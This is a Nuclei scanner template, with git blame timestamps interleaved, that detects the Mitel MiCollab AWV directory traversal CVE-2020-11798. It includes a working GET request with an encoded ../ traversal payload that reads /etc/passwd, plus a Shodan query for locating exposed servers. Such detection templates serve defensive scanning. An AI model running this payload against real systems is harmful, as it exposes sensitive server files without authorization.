nuclei-templates/http/cves/2020/CVE-2020-11798.yaml

57 lines
2.3 KiB
YAML
Raw Normal View History

2023-08-25 06:08:13 +00:00
id: CVE-2020-11798
info:
2023-08-25 08:27:04 +00:00
name: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal
2023-08-25 06:08:13 +00:00
author: ritikchaddha
severity: medium
description: |
A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.
2023-09-06 12:22:36 +00:00
remediation: |
Apply the latest security patches or updates provided by Mitel to mitigate the vulnerability and prevent unauthorized access.
2023-08-25 06:08:13 +00:00
reference:
- https://packetstormsecurity.com/files/171751/mma913-traversallfi.txt
- https://nvd.nist.gov/vuln/detail/CVE-2020-11798
2023-08-31 11:46:18 +00:00
- http://packetstormsecurity.com/files/171751/Mitel-MiCollab-AWV-8.1.2.4-9.1.3-Directory-Traversal-LFI.html
- https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin-20-0005-01.pdf
- https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-20-0005
2023-08-25 06:08:13 +00:00
classification:
2023-08-25 08:27:04 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
2023-08-31 11:46:18 +00:00
cve-id: CVE-2020-11798
2023-08-25 08:27:04 +00:00
cwe-id: CWE-22
epss-score: 0.8339
epss-percentile: 0.98124
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:*
2023-08-25 06:08:13 +00:00
metadata:
verified: true
2023-09-06 12:22:36 +00:00
max-request: 1
2023-08-31 11:46:18 +00:00
vendor: mitel
product: micollab_audio\,_web_\&_video_conferencing
2023-09-06 12:22:36 +00:00
shodan-query: html:"Mitel" html:"MiCollab"
2023-08-31 11:46:18 +00:00
tags: packetstorm,cve,cve2020,mitel,micollab,lfi
2023-08-25 06:08:13 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- application/x-download
- filename=passwd
condition: and
- type: status
status:
- 200
# digest: 490a004630440220251492a316adb487b05adf228137cf5074b269214e779109fe5fe6a462dc5b5502202438cdc81dc98b60d8c3d945d1ae9f82953bac33b9696c1556a56537c82f3f98:922c64590222798bb761d5b6d8e72950